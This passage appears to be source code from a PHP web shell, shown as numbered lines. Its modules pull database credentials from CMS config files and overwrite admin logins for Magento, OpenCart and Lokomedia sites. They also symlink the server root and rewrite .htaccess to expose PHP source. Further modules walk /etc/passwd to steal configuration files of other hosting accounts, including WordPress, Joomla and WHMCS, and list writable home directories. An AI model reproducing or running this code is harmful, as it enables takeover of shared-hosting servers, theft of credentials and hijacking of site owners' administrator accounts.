  1094. $dbpass = ambilkata($config, "<password><![CDATA[", "]]></password>");
  1095. $dbname = ambilkata($config, "<dbname><![CDATA[", "]]></dbname>");
  1096. $dbprefix = ambilkata($config, "<table_prefix><![CDATA[", "]]></table_prefix>");
  1097. $prefix = $dbprefix . "admin_user";
  1098. $option = $dbprefix . "core_config_data";
  1099. $conn = mysqli_connect($dbhost, $dbuser, $dbpass);
  1100. $db = mysqli_select_db($conn,$dbname);
  1101. $q = mysqli_query($conn,"SELECT * FROM $prefix ORDER BY user_id ASC");
  1102. $result = mysqli_fetch_array($q,MYSQLI_ASSOC);
  1103. $id = $result["user_id"];
  1104. $q2 = mysqli_query($conn,"SELECT * FROM $option WHERE path='web/secure/base_url'");
  1105. $result2 = mysqli_fetch_array($q2,MYSQLI_ASSOC);
  1106. $target = $result2["value"];
  1107. if ($target == '') {
  1108. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1109. } else {
  1110. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1111. }
  1112. $update = mysqli_query($conn,"UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
  1113. echo "[ " . $file_conf . " ]<br>";
  1114. echo "CMS => Magento<br>";
  1115. echo $url_target;
  1116. if (!$update or !$conn or !$db) {
  1117. echo "[-] <font color=red>" . mysqli_error() . "</font><br><br>";
  1118. } else {
  1119. echo "[+] username: <font color=lime>$user</font><br>";
  1120. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1121. }
  1122. mysqli_close($conn);
  1123. } elseif (preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $config)) {
  1124. $dbhost = ambilkata($config, "'DB_HOSTNAME', '", "'");
  1125. $dbuser = ambilkata($config, "'DB_USERNAME', '", "'");
  1126. $dbpass = ambilkata($config, "'DB_PASSWORD', '", "'");
  1127. $dbname = ambilkata($config, "'DB_DATABASE', '", "'");
  1128. $dbprefix = ambilkata($config, "'DB_PREFIX', '", "'");
  1129. $prefix = $dbprefix . "user";
  1130. $conn = mysqli_connect($dbhost, $dbuser, $dbpass);
  1131. $db = mysqli_select_db($conn,$dbname);
  1132. $q = mysqli_query($conn,"SELECT * FROM $prefix ORDER BY user_id ASC");
  1133. $result = mysqli_fetch_array($q,MYSQLI_ASSOC);
  1134. $id = $result["user_id"];
  1135. $target = ambilkata($config, "HTTP_SERVER', '", "'");
  1136. if ($target == '') {
  1137. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1138. } else {
  1139. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1140. }
  1141. $update = mysqli_query($conn,"UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
  1142. echo "[ " . $file_conf . " ]<br>";
  1143. echo "CMS => OpenCart<br>";
  1144. echo $url_target;
  1145. if (!$update or !$conn or !$db) {
  1146. echo "[-] <font color=red>" . mysqli_error() . "</font><br><br>";
  1147. } else {
  1148. echo "[+] username: <font color=lime>$user</font><br>";
  1149. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1150. }
  1151. mysqli_close($conn);
  1152. } elseif (preg_match("/panggil fungsi validasi xss dan injection/", $config)) {
  1153. $dbhost = ambilkata($config, 'server = "', '"');
  1154. $dbuser = ambilkata($config, 'username = "', '"');
  1155. $dbpass = ambilkata($config, 'password = "', '"');
  1156. $dbname = ambilkata($config, 'database = "', '"');
  1157. $prefix = "users";
  1158. $option = "identitas";
  1159. $conn = mysqli_connect($dbhost, $dbuser, $dbpass);
  1160. $db = mysqli_select_db($conn,$dbname);
  1161. $q = mysqli_query($conn,"SELECT * FROM $option ORDER BY id_identitas ASC");
  1162. $result = mysqli_fetch_array($q,MYSQLI_ASSOC);
  1163. $target = $result["alamat_website"];
  1164. if ($target == '') {
  1165. $target2 = $result["url"];
  1166. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1167. if ($target2 == '') {
  1168. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1169. } else {
  1170. $cek_login3 = file_get_contents_("$target2/adminweb/");
  1171. $cek_login4 = file_get_contents_("$target2/lokomedia/adminweb/");
  1172. if (preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1173. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1174. } elseif (preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1175. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1176. } else {
  1177. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1178. }
  1179. }
  1180. } else {
  1181. $cek_login = file_get_contents_("$target/adminweb/");
  1182. $cek_login2 = file_get_contents_("$target/lokomedia/adminweb/");
  1183. if (preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1184. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1185. } elseif (preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1186. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1187. } else {
  1188. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1189. }
  1190. }
  1191. $update = mysqli_query($conn,"UPDATE $prefix SET username='$user',password='$passx' WHERE level='admin'");
  1192. echo "[ " . $file_conf . " ]<br>";
  1193. echo "CMS => Lokomedia<br>";
  1194. if (preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1195. echo $url_target2;
  1196. } else {
  1197. echo $url_target;
  1198. }
  1199. if (!$update or !$conn or !$db) {
  1200. echo "[-] <font color=red>" . mysqli_error() . "</font><br><br>";
  1201. } else {
  1202. echo "[+] username: <font color=lime>$user</font><br>";
  1203. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1204. }
  1205. mysqli_close($conn);
  1206. }
  1207. }
  1208. }
  1209. } elseif (isset($_GET['do']) && ($_GET['do'] == 'grabpass')) {
  1210. if (isset($_POST['gass'])) {
  1211. echo "<center><h1>Config Password Grabber</h1>
  1212. <form method='post'>
  1213. Link Config: <br>
  1214. <textarea name='link' style='width: 450px; height:250px;'>";
  1215. UrlLoop($_POST['linkconf'], 'txt');
  1216. echo "</textarea><br>
  1217. <input type='submit' style='width: 450px;' name='grabpass' value='Hajar!!'>
  1218. </form></center>";
  1219. } else {
  1220. echo "<center><h1>Config Password Grabber</h1>
  1221. <form method='post'>
  1222. Link Config: <br>
  1223. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/0xsym/'><br>
  1224. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1225. </form></center>";
  1226. }
  1227. if (isset($_POST['grabpass'])) {
  1229. $link = explode("\r\n", $_POST['link']);
  1230. echo '<textarea>';
  1231. foreach ($link as $dir_config) {
  1232. $ambilpass = ambil_password($dir_config);
  1233. $hh = @file_get_contents("password.txt");
  1234. @file_put_contents("password.txt", $hh . $ambilpass);
  1236. echo $ambilpass;
  1238. }
  1239. echo '</textarea>';
  1240. }
  1241. } elseif (isset($_GET['do']) && ($_GET['do'] == 'symlink')) {
  1242. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1243. $d0mains = @file("/etc/named.conf");
  1244. if ($d0mains) {
  1245. @mkdir("0xsymlink", 0777);
  1246. @chdir("0xsymlink");
  1247. @exe("ln -s / root");
  1248. $file3 = 'Options Indexes FollowSymLinks
  1249. DirectoryIndex jancox.htm
  1250. AddType text/plain .php
  1251. AddHandler text/plain .php
  1252. Satisfy Any';
  1253. $fp3 = fopen('.htaccess', 'w');
  1254. $fw3 = fwrite($fp3, $file3);
  1255. @fclose($fp3);
  1256. echo "
  1257. <table align=center border=1 style='width:60%;border-color:#333333;'>
  1258. <tr>
  1259. <td align=center><font size=2>S. No.</font></td>
  1260. <td align=center><font size=2>Domains</font></td>
  1261. <td align=center><font size=2>Users</font></td>
  1262. <td align=center><font size=2>Symlink</font></td>
  1263. </tr>";
  1264. $dcount = 1;
  1265. foreach ($d0mains as $d0main) {
  1266. if (@eregi("zone", $d0main)) {
  1267. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1268. flush();
  1269. if (strlen(trim($domains[1][0])) > 2) {
  1270. $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
  1271. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  1272. <td align=left><a href=http://www." . $domains[1][0] . "/><font class=txt>" . $domains[1][0] . "</font></a></td>
  1273. <td>" . $user['name'] . "</td>
  1274. <td><a href='$full/0xsymlink/root/home/" . $user['name'] . "/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  1275. flush();
  1276. $dcount++;}}}
  1277. echo "</table>";
  1278. } else {
  1279. $TEST = $etcpasswd;
  1280. if ($TEST) {
  1281. @mkdir("0xsymlink", 0777);
  1282. @chdir("0xsymlink");
  1283. exe("ln -s / root");
  1284. $file3 = 'Options Indexes FollowSymLinks
  1285. DirectoryIndex jancox.htm
  1286. AddType text/plain .php
  1287. AddHandler text/plain .php
  1288. Satisfy Any';
  1289. $fp3 = fopen('.htaccess', 'w');
  1290. $fw3 = fwrite($fp3, $file3);
  1291. @fclose($fp3);
  1292. echo "
  1293. <table align=center border=1><tr>
  1294. <td align=center>S. No.</td>
  1295. <td align=center>Users</td>
  1296. <td align=center>Symlink</td></tr>";
  1297. $dcount = 1;
  1298. $file = $etcpasswd;
  1299. preg_match_all('/(.*?):x:/', $file, $file);
  1300. foreach ($file[1] as $matches) {
  1301. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1302. <td align=center><font class=txt>" . $matches . "</td>";
  1303. echo "<td align=center><font class=txt><a href=$full/0xsymlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1304. $dcount++;
  1305. }
  1306. echo "</table>";
  1307. } else {
  1309. if ($os != "Windows") {
  1310. @mkdir("0xsymlink", 0777);
  1311. @chdir("0xsymlink");
  1312. @exe("ln -s / root");
  1313. $file3 = '
  1314. Options Indexes FollowSymLinks
  1315. DirectoryIndex jancox.htm
  1316. AddType text/plain .php
  1317. AddHandler text/plain .php
  1318. Satisfy Any
  1319. ';
  1320. $fp3 = fopen('.htaccess', 'w');
  1321. $fw3 = fwrite($fp3, $file3);@fclose($fp3);
  1322. echo "
  1323. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  1324. <table align=center border=1><tr>
  1325. <td align=center><font size=3>ID</font></td>
  1326. <td align=center><font size=3>Users</font></td>
  1327. <td align=center><font size=3>Symlink</font></td></tr>";
  1328. $temp = "";
  1329. $val1 = 0;
  1330. $val2 = 1000;
  1331. for (; $val1 <= $val2; $val1++) {
  1332. $uid = @posix_getpwuid($val1);
  1333. if ($uid) {
  1334. $temp .= join(':', $uid) . "\n";
  1335. }
  1336. }
  1337. echo '<br/>';
  1338. $temp = trim($temp);
  1339. $file5 =
  1340. fopen("test.txt", "w");
  1341. fputs($file5, $temp);
  1342. fclose($file5);
  1343. $dcount = 1;
  1344. $file =
  1345. fopen("test.txt", "r") or exit("Unable to open file!");
  1346. while (!feof($file)) {
  1347. $s = fgets($file);
  1348. $matches = array();
  1349. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1350. $matches = str_replace("home/", "", $matches[1]);
  1351. if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") {
  1352. continue;
  1353. }
  1355. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1356. <td align=center><font class=txt>" . $matches . "</td>";
  1357. echo "<td align=center><font class=txt><a href=$full/0xsymlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1358. $dcount++;}
  1359. fclose($file);
  1360. echo "</table></div></center>";
  1361. unlink("test.txt");
  1362. } else {
  1363. echo "<center><font size=3>Cannot create Symlink</font></center>";
  1364. }
  1366. }
  1367. }
  1368. } elseif (isset($_GET['do']) && ($_GET['do'] == 'config')) {
  1369. if (strtolower(substr(PHP_OS, 0, 3)) == "win") {
  1370. echo '<script>alert("Tidak bisa di gunakan di server windows")</script>';
  1371. exit;
  1372. }
  1373. if ($_POST) {
  1374. if ($_POST['tipe'] == 'grabsymv') {
  1375. @mkdir("0xsymv", 0777);
  1376. exe("ln -s / 0xsymv/root");
  1377. $htaccess = "Options Indexes FollowSymLinks
  1378. DirectoryIndex jancox.htm
  1379. AddType text/plain .php
  1380. AddHandler text/plain .php
  1381. Satisfy Any";
  1382. @file_put_contents("0xsymv/.htaccess", $htaccess);
  1383. $etc_passwd = $_POST['passwd'];
  1385. $etc_passwd = explode("\n", $etc_passwd);
  1386. foreach ($etc_passwd as $passwd) {
  1387. $pawd = explode(":", $passwd);
  1388. $user = $pawd[5];
  1389. $usera = preg_replace('/\/var\/www\/vhosts\//', '', $user);
  1390. if (preg_match('/vhosts/i', $user)) {
  1391. exe("ln -s " . $user . "/httpdocs/wp-config.php 0xsymv/" . $usera . "-Wordpress.txt");
  1392. exe("ln -s " . $user . "/httpdocs/configuration.php 0xsymv/" . $usera . "-Joomla.txt");
  1393. exe("ln -s " . $user . "/httpdocs/config/koneksi.php 0xsymv/" . $usera . "-Lokomedia.txt");
  1394. exe("ln -s " . $user . "/httpdocs/forum/config.php 0xsymv/" . $usera . "-phpBB.txt");
  1395. exe("ln -s " . $user . "/httpdocs/sites/default/settings.php 0xsymv/" . $usera . "-Drupal.txt");
  1396. exe("ln -s " . $user . "/httpdocs/config/settings.inc.php 0xsymv/" . $usera . "-PrestaShop.txt");
  1397. exe("ln -s " . $user . "/httpdocs/app/etc/local.xml 0xsymv/" . $usera . "-Magento.txt");
  1398. exe("ln -s " . $user . "/httpdocs/admin/config.php 0xsymv/" . $usera . "-OpenCart.txt");
  1399. exe("ln -s " . $user . "/httpdocs/application/config/database.php 0xsymv/" . $usera . "-Ellislab.txt");
  1400. }}}
  1401. if ($_POST['tipe'] == 'grabsym') {
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  1432. fwrite($htc, $isi_htc);
  1433. }
  1434. $passwd = $_POST['passwd'];
  1436. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1437. foreach ($user_config[1] as $user_cox) {
  1438. $grab_config = array(
  1439. "/home/$user_cox/.accesshash" => "WHM-accesshash",
  1440. "/home/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  1441. "/home/$user_cox/public_html/forum/config.php" => "phpBB",
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  1445. "/home/$user_cox/public_html/admin/config.php" => "OpenCart",
  1446. "/home/$user_cox/public_html/application/config/database.php" => "Ellislab",
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  1448. "/home/$user_cox/public_html/includes/config.php" => "Vbulletin",
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  1452. "/home/$user_cox/public_html/inc/config.php" => "MyBB",
  1453. "/home/$user_cox/public_html/includes/configure.php" => "OsCommerce",
  1454. "/home/$user_cox/public_html/shop/includes/configure.php" => "OsCommerce",
  1455. "/home/$user_cox/public_html/os/includes/configure.php" => "OsCommerce",
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  1458. "/home/$user_cox/public_html/cart/includes/configure.php" => "OsCommerce",
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  1460. "/home/$user_cox/public_html/wp-config.php" => "Wordpress",
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  1466. "/home/$user_cox/public_html/wp/wp-config.php" => "Wordpress",
  1467. "/home/$user_cox/public_html/WP/wp-config.php" => "Wordpress",
  1468. "/home/$user_cox/public_html/news/wp-config.php" => "Wordpress",
  1469. "/home/$user_cox/public_html/wordpress/wp-config.php" => "Wordpress",
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  1471. "/home/$user_cox/public_html/demo/wp-config.php" => "Wordpress",
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  1475. "/home/$user_cox/public_html/press/wp-config.php" => "Wordpress",
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  1478. "/home/$user_cox/public_html/configuration.php" => "Joomla",
  1479. "/home/$user_cox/public_html/blog/configuration.php" => "Joomla",
  1480. "/home/$user_cox/public_html/submitticket.php" => "^WHMCS",
  1481. "/home/$user_cox/public_html/cms/configuration.php" => "Joomla",
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  1483. "/home/$user_cox/public_html/portal/configuration.php" => "Joomla",
  1484. "/home/$user_cox/public_html/site/configuration.php" => "Joomla",
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  1495. "/home/$user_cox/public_html/Whmcs/submitticket.php" => "WHMCS",
  1496. "/home/$user_cox/public_html/whmcs/submitticket.php" => "WHMCS",
  1497. "/home/$user_cox/public_html/whmcs/submitticket.php" => "WHMCS",
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  1499. "/home/$user_cox/public_html/Whmc/submitticket.php" => "WHMCS",
  1500. "/home/$user_cox/public_html/whmc/submitticket.php" => "WHMCS",
  1501. "/home/$user_cox/public_html/WHM/submitticket.php" => "WHMCS",
  1502. "/home/$user_cox/public_html/Whm/submitticket.php" => "WHMCS",
  1503. "/home/$user_cox/public_html/whm/submitticket.php" => "WHMCS",
  1504. "/home/$user_cox/public_html/HOST/submitticket.php" => "WHMCS",
  1505. "/home/$user_cox/public_html/Host/submitticket.php" => "WHMCS",
  1506. "/home/$user_cox/public_html/host/submitticket.php" => "WHMCS",
  1507. "/home/$user_cox/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  1508. "/home/$user_cox/public_html/Supportes/submitticket.php" => "WHMCS",
  1509. "/home/$user_cox/public_html/supportes/submitticket.php" => "WHMCS",
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  1511. "/home/$user_cox/public_html/domain/submitticket.php" => "WHMCS",
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  1514. "/home/$user_cox/public_html/hosting/submitticket.php" => "WHMCS",
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  1523. "/home/$user_cox/public_html/client/submitticket.php" => "WHMCS",
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  1525. "/home/$user_cox/public_html/Clientarea/submitticket.php" => "WHMCS",
  1526. "/home/$user_cox/public_html/clientarea/submitticket.php" => "WHMCS",
  1527. "/home/$user_cox/public_html/SUPPORT/submitticket.php" => "WHMCS",
  1528. "/home/$user_cox/public_html/Support/submitticket.php" => "WHMCS",
  1529. "/home/$user_cox/public_html/support/submitticket.php" => "WHMCS",
  1530. "/home/$user_cox/public_html/BILLING/submitticket.php" => "WHMCS",
  1531. "/home/$user_cox/public_html/Billing/submitticket.php" => "WHMCS",
  1532. "/home/$user_cox/public_html/billing/submitticket.php" => "WHMCS",
  1533. "/home/$user_cox/public_html/BUY/submitticket.php" => "WHMCS",
  1534. "/home/$user_cox/public_html/Buy/submitticket.php" => "WHMCS",
  1535. "/home/$user_cox/public_html/buy/submitticket.php" => "WHMCS",
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  1537. "/home/$user_cox/public_html/Manage/submitticket.php" => "WHMCS",
  1538. "/home/$user_cox/public_html/manage/submitticket.php" => "WHMCS",
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  1540. "/home/$user_cox/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1541. "/home/$user_cox/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1542. "/home/$user_cox/public_html/clientsupport/submitticket.php" => "WHMCS",
  1543. "/home/$user_cox/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1544. "/home/$user_cox/public_html/Checkout/submitticket.php" => "WHMCS",
  1545. "/home/$user_cox/public_html/checkout/submitticket.php" => "WHMCS",
  1546. "/home/$user_cox/public_html/BILLINGS/submitticket.php" => "WHMCS",
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  1548. "/home/$user_cox/public_html/billings/submitticket.php" => "WHMCS",
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  1561. "/home/$user_cox/public_html/PURCHASE/submitticket.php" => "WHMCS",
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  1563. "/home/$user_cox/public_html/purchase/submitticket.php" => "WHMCS",
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  1566. "/home/$user_cox/public_html/account/submitticket.php" => "WHMCS",
  1567. "/home/$user_cox/public_html/USER/submitticket.php" => "WHMCS",
  1568. "/home/$user_cox/public_html/User/submitticket.php" => "WHMCS",
  1569. "/home/$user_cox/public_html/user/submitticket.php" => "WHMCS",
  1570. "/home/$user_cox/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1571. "/home/$user_cox/public_html/Clients/submitticket.php" => "WHMCS",
  1572. "/home/$user_cox/public_html/clients/submitticket.php" => "WHMCS",
  1573. "/home/$user_cox/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1574. "/home/$user_cox/public_html/Billings/submitticket.php" => "WHMCS",
  1575. "/home/$user_cox/public_html/billings/submitticket.php" => "WHMCS",
  1576. "/home/$user_cox/public_html/MY/submitticket.php" => "WHMCS",
  1577. "/home/$user_cox/public_html/My/submitticket.php" => "WHMCS",
  1578. "/home/$user_cox/public_html/my/submitticket.php" => "WHMCS",
  1579. "/home/$user_cox/public_html/secure/whm/submitticket.php" => "WHMCS",
  1580. "/home/$user_cox/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1581. "/home/$user_cox/public_html/panel/submitticket.php" => "WHMCS",
  1582. "/home/$user_cox/public_html/clientes/submitticket.php" => "WHMCS",
  1583. "/home/$user_cox/public_html/cliente/submitticket.php" => "WHMCS",
  1584. "/home/$user_cox/public_html/support/order/submitticket.php" => "WHMCS",
  1585. "/home/$user_cox/public_html/bb-config.php" => "BoxBilling",
  1586. "/home/$user_cox/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1587. "/home/$user_cox/public_html/box/bb-config.php" => "BoxBilling",
  1588. "/home/$user_cox/public_html/host/bb-config.php" => "BoxBilling",
  1589. "/home/$user_cox/public_html/Host/bb-config.php" => "BoxBilling",
  1590. "/home/$user_cox/public_html/supportes/bb-config.php" => "BoxBilling",
  1591. "/home/$user_cox/public_html/support/bb-config.php" => "BoxBilling",
  1592. "/home/$user_cox/public_html/hosting/bb-config.php" => "BoxBilling",
  1593. "/home/$user_cox/public_html/cart/bb-config.php" => "BoxBilling",
  1594. "/home/$user_cox/public_html/order/bb-config.php" => "BoxBilling",
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  1596. "/home/$user_cox/public_html/clients/bb-config.php" => "BoxBilling",
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  1598. "/home/$user_cox/public_html/clientes/bb-config.php" => "BoxBilling",
  1599. "/home/$user_cox/public_html/billing/bb-config.php" => "BoxBilling",
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  1601. "/home/$user_cox/public_html/my/bb-config.php" => "BoxBilling",
  1602. "/home/$user_cox/public_html/secure/bb-config.php" => "BoxBilling",
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  1608. "/home/$user_cox/public_html/shop/includes/dist-configure.php" => "Zencart",
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  1610. "/home/$user_cox/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1611. "/home/$user_cox/public_html/host/includes/iso4217.php" => "Hostbills",
  1612. "/home/$user_cox/public_html/Host/includes/iso4217.php" => "Hostbills",
  1613. "/home/$user_cox/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1614. "/home/$user_cox/public_html/support/includes/iso4217.php" => "Hostbills",
  1615. "/home/$user_cox/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1616. "/home/$user_cox/public_html/cart/includes/iso4217.php" => "Hostbills",
  1617. "/home/$user_cox/public_html/order/includes/iso4217.php" => "Hostbills",
  1618. "/home/$user_cox/public_html/client/includes/iso4217.php" => "Hostbills",
  1619. "/home/$user_cox/public_html/clients/includes/iso4217.php" => "Hostbills",
  1620. "/home/$user_cox/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1621. "/home/$user_cox/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1622. "/home/$user_cox/public_html/billing/includes/iso4217.php" => "Hostbills",
  1623. "/home/$user_cox/public_html/billings/includes/iso4217.php" => "Hostbills",
  1624. "/home/$user_cox/public_html/my/includes/iso4217.php" => "Hostbills",
  1625. "/home/$user_cox/public_html/secure/includes/iso4217.php" => "Hostbills",
  1626. "/home/$user_cox/public_html/support/order/includes/iso4217.php" => "Hostbills",
  1627. );
  1629. foreach ($grab_config as $config => $nama_config) {
  1630. if ($_POST['tipe'] == 'grab') {
  1631. $ambil_config = file_get_contents($config);
  1632. if ($ambil_config == '') {
  1633. } else {
  1634. $file_config = fopen("0xgrab/$user_cox-$nama_config.txt", "w");
  1635. fputs($file_config, $ambil_config);
  1636. }
  1637. }
  1638. if ($_POST['tipe'] == 'grabsym') {
  1639. @symlink($config, "0xsym/" . $user_cox . "-" . $nama_config . ".txt");
  1640. }
  1641. if ($_POST['tipe'] == 'grabsym404') {
  1642. $sym404 = symlink($config, "0xsym404/" . $user_cox . "-" . $nama_config . ".txt");
  1643. if ($sym404) {
  1644. @mkdir("0xsym404/" . $user_cox . "-" . $nama_config . ".txt404", 0777);
  1645. $xsym404 = "Options Indexes FollowSymLinks
  1646. DirectoryIndex jancox.htm
  1647. HeaderName 0x.txt
  1648. Satisfy Any
  1649. IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
  1650. IndexIgnore *
  1651. IndexStyleSheet 'https://0x1999.github.io/0xShell/style/melex.css'";
  1653. @file_put_contents("0xsym404/" . $user_cox . "-" . $nama_config . ".txt404/.htaccess", $xsym404);
  1655. @symlink($config, "0xsym404/" . $user_cox . "-" . $nama_config . ".txt404/0x.txt");
  1657. }
  1659. }
  1661. }
  1662. }if ($_POST['tipe'] == 'grab') {
  1663. echo "<center><a href='?dir=$dir/0xgrab'><font color=lime>Done</font></a></center>";
  1664. }
  1665. if ($_POST['tipe'] == 'grabsym404') {
  1666. echo "<center>
  1667. <a href=\"0xsym404/root/\">Root Server</a>
  1668. <br><a href=\"0xsym404/\">Configurations</a></center>";
  1669. }
  1670. if ($_POST['tipe'] == 'grabsym') {
  1671. echo "<center>
  1672. <a href=\"0xsym/root/\">Root Server</a>
  1673. <br><a href=\"0xsym/\">Configurations</a></center>";
  1674. }if ($_POST['tipe'] == 'grabsymv') {
  1675. echo "<center>
  1676. <a href=\"0xsymv/root/\">Root Server</a>
  1677. <br><a href=\"0xsymv/\">Configurations</a></center>";
  1678. }
  1680. } else {
  1681. echo "<form method=\"post\" action=\"\"><center>
  1682. <select class=\"select\" name=\"tipe\" style=\"width: 450px;\" height=\"10\">
  1683. <option value=\"grab\">Config Grab</option>
  1684. <option value=\"grabsym\">Symlink Config</option>
  1685. <option value=\"grabsym404\">Symlink Config 404</option>
  1686. <option value=\"grabsymv\">VHosts Symlink Config</option>
  1687. </center></select>
  1688. <br>\n";
  1689. if (!$etcpasswd) {
  1690. echo "<textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1691. for ($uid = 0; $uid < 60000; $uid++) {
  1692. $ara = posix_getpwuid($uid);
  1693. if (!empty($ara)) {
  1694. while (list($key, $val) = each($ara)) {
  1695. print "$val:";
  1696. }
  1697. print "\n";
  1698. }
  1699. }
  1700. echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  1701. } else {
  1702. echo "<textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1703. echo $etcpasswd;
  1704. echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  1706. }
  1707. }
  1709. } elseif (isset($_GET['do']) && ($_GET['do'] == 'cekjum')) {
  1710. echo '<form method="post" action="" style="float: left;">
  1711. Dir :
  1712. <input size="30" name="cekjum" height="10" type="text"><input name="submit" value=">>" type="submit">
  1713. </form><br><br>';
  1714. if ($_POST) {
  1715. echo cekjum($_REQUEST['cekjum']);
  1716. } else {
  1717. echo cekjum($_GET['cekjum']);
  1718. }
  1719. } elseif (isset($_GET['do']) && ($_GET['do'] == 'jump')) {
  1720. $i = 0;
  1721. echo "<pre><div class='margin: 5px auto;'>";
  1722. $etc = $etcpasswd;
  1724. if (!$etc) {
  1725. echo "<font color=red>Can't read /etc/passwd</font>";
  1726. } else {
  1727. preg_match_all('/(.*?):x:/', $etc, $user_jumping);
  1728. foreach ($user_jumping[1] as $userjum) {
  1729. $userjumdir = "/home/$userjum/public_html";
  1730. $perm = permissions($userjumdir);
  1731. $perm = w($userjumdir, $perm);
  1733. if (@is_readable($userjumdir)) {
  1734. $i++;
  1735. $jrw = "<a>[<font color=lime>R</font>] [$perm] </a><a href='?dir=$userjumdir'><font color=gold>$userjumdir</font></a> <a href='?do=cekjum&cekjum=$userjumdir' target='_blank'>Check</a><br>";
  1736. if (is_writable($userjumdir)) {
  1737. $jrw = "<a>[<font color=lime>RW</font>] [$perm] </a><a href='?dir=$userjumdir'><font color=gold>$userjumdir</font></a> <a href='?do=cekjum&cekjum=$userjumdir' target='_blank'>Check</a><br>";
  1738. }
  1739. echo $jrw;
  1740. }
  1741. }
  1742. }
  1743. if ($i == 0) {
  1744. } else {
  1745. echo "<br>Total ada " . $i . " Kimcil di " . gethostbyname($_SERVER['HTTP_HOST']) . "";
  1746. }
  1747. echo "</div></pre>";
  1748. } elseif (isset($_GET['do']) && ($_GET['do'] == 'setting')) {
  1749. echo "<center>
  1750. <h1>Manual Setting Area</h1>
  1751. <form method='post'>
  1752. <br><input type='submit' value='RESET ALL' name='reset'><br>
  1753. etc/passwd<br>
  1754. <textarea style='background:black;outline:none;' name='etcpasswd' rows='10' cols='67'>$etcpasswd</textarea>
  1755. <input type='submit' value='Save'>
  1756. <br>etc/trueuserowners<br>
  1757. <textarea style='background:black;outline:none;' name='etctrueuserowners' rows='10' cols='67'>$etctrueuserowners</textarea>
  1758. <input type='submit' value='Save'>
  1759. <br>etc/named.conf<br>
  1760. <textarea style='background:black;outline:none;' name='etcnamedconf' rows='10' cols='67'>$etcnamedconf</textarea>
  1761. <input type='submit' value='Save'>
  1762. <br>configlist<br>
  1763. <textarea style='background:black;outline:none;' name='configlist' rows='10' cols='67'>$configlist</textarea>
  1764. <br><input type='submit' value='Save'>
  1765. </form></center>";
  1766. // $etctrueuserowners
  1767. if (isset($_POST['etcpasswd'])) {
  1768. $_SESSION['etcpasswd'] = $_POST['etcpasswd'];
  1769. }
  1770. if (isset($_POST['etctrueuserowners'])) {
  1771. $_SESSION['etctrueuserowners'] = $_POST['etctrueuserowners'];
  1772. }
  1773. if (isset($_POST['etcnamedconf'])) {
